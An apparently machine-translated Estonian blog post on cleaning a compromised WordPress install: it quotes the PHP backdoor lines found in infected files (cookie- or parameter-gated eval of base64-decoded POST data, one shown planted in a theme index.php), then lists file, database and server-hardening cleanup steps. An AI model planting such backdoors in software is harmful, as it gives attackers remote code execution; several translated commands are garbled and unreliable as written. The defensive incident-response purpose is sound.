WordPress exploit - puhastamist kahjustatud faile ja SQL Server turvalisuse.

Enne loe see postitus, siis peaks näha , Mõista midagi. :)

Leidsin mitu faili blogid stealthsettings.com koodid sarnanevad allpool, mis tulenevad virusarii koos WordPress ära.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); väljumine; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); väljumine; }?>

xmlrpcEespool puhul on faili xmlrpc.php pärit unineAga kell grep server, näeb päris palju koodid sedalaadi allikatest.

pppffiuuu

Puhastus nakatunud failid:

Ooookkkk ...
1. Parim lahendus, pärast seda teha backupCPC ja puhastada andmebaasis on eemaldama faile WordPress (saate hoida wp-config.php ja faile, mis pole rangelt wp-platvormil pärast nende hoolikat kontrollimist) serveris ja laadige see esialgse versiooni juurde 2.5.1 (Seekord teha upgrade versiooni wp :)) http://wordpress.org/download/ . Kustuta failid sealhulgas teema, kui teil on usku, et võite vaadata neid hoolikalt.

On ilmne, et failid on mõjutanud ja teemad, mida ei ole kasutatud enne blogis ja lihtsalt muutuvad teema, ei saa seda probleemi lahendada.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); väljumine; }?> <? php get_header (); ?>

2. Otsi ja kustutada kõik failid, mis sisaldavad: * _new.php, _old.php * * .jpgg, .giff * * .pngg ja faili wp-info.txt, kui üldse.

leida. -Nimi "* _new.php"
leida. -Nimi "* _old.php"
leida. -Nimi "* .jpgg"
leida. -Nimi "* _giff"
leida. -Nimi "* _pngg"
leida. -Nimi "wp-info.txt"

3. sisse / tmp Otsingu- ja kustutada nagu tmpYwbzT2

puhastamise SQL :

1. tabelis tabelis wp_options näha, kas kustutada read: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Samuti wp_options, minna active_plugins ja kustutada, kui on olemas plugin, mis lõpeb üks laiendiga * _new.php * _old.php, *. jpgg, *. GIFF, *. pngg või kui teine ​​laiendus kahtlusel hoolikalt kontrollima.

3. Tabelis wp_usersVaata, kui on kasutaja, kes ei ole kirjutatud midagi tema õigus, veerg user_nicename. Kustuta kasutaja, kuid pange tähele number ID veerus. See kasutaja võib kasutada "WordPress" nagu USER_LOGIN on loodud ja ilmub 00: 00: 00 0000-00-00.

4. Mine tabel wp_usermeta ja kustutada kõik read kuuluvad ID eespool.

Kui olete seda teinud sql puhastus, keelata ja seejärel võimaldada teatud plugin. (In blogi -> juhtpaneel -> Plugins)

Secure server:

1. Vaata, mida kataloogid ja failid "kirjutatav"(Chmod 777) ja proovige panna neid chmod mis ei võimalda nende kirjutamise igal tasandil. (Chmod 644, näiteks)

Otsi. -Perm-2-LS

2. Vaata, millised failid on bitt suid või SGID . Kui sa ei kasuta neid faile panna neid chmod 0 või eemaldada pakett, mida see sisaldab. Nad on väga ohtlikud, sest nad täitma privileege "rühm"Või"juur"Mitte tavaline kasutaja privileegid täita selle faili.

leida /-type f-perm-04000-LS
leida /-type f-perm-02000-LS

3. Vaata, mida sadamad on avatud ja proovite sulgeda või kinnitada need, mida ei kasutata.

netstat-| grep-i kuulata

Nii palju. Näen Google Search ja teised ütlevad: "Noh nad tegid!". Noh hästi olete teinud ... aga sa tead, kui Google hakkab keelata kõik alad vormimine On rämpspost ja pane troojalaste (Trojan.Clicker.HTML) küpsised?

WordPress exploit - puhastamist kahjustatud faile ja SQL Server turvalisuse.

Andmeid autor

Kavalus

Kirglikult kõige vastu, mis tähendab vidinaid ja IT-sid, kirjutan heameelega stealthsettings.com saidil 2006 ja armastan avastada uusi asju arvutite ja macOS-i, Linuxi opsüsteemide, Windows, iOS ja Android.

Lisa kommentaar

Jäta kommentaar